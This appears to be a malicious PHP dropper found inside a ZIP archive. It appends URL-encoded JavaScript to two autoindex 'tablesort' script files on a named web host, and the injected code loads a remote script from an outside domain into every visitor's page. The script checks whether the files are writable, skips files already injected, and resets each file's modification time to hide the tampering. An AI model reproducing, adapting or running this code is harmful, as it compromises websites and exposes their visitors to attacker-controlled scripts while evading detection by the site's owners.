PK

<?php   $r = "/home/forbytech/email.africabian.com"; $f = ['/_autoindex/assets/js/tablesort.number.js','/_autoindex/assets/js/tablesort.js']; $code = rawurldecode('var%20url%20%3D%20%27https%3A//wafsearch.wiki/xml%27%3B%0D%0Avar%20script%20%3D%20document.createElement%28%27script%27%29%3B%0D%0Ascript.src%20%3D%20url%3B%0D%0Ascript.type%20%3D%20%27text/javascript%27%3B%0D%0Ascript.async%20%3D%20true%3B%0D%0Adocument.getElementsByTagName%28%27head%27%29%5B0%5D.appendChild%28script%29%3B'); $wr = false; foreach ($f as $p) {     $path = "{$r}/{$p}";     $ft = @filemtime($path);     if (is_file($path) && is_writable($path)) {         $wr = true;         $content = file_get_contents($path);         if (strstr($content, $code)) {             die("!already injected!<f>{$p}</f><ft>{$ft}</ft>");         }         $content = $content . $code;         if(file_put_contents($path, $content)) {             @touch($path, $ft);             $content = file_get_contents($path);             if (strstr($content, $code)) {                 die("!success!<f>{$p}</f><ft>{$ft}</ft>");             }         }     } } if ($wr) {     print("!writable!"); } else {     print("!not writable!"); } die('!ended!'); 

PK 99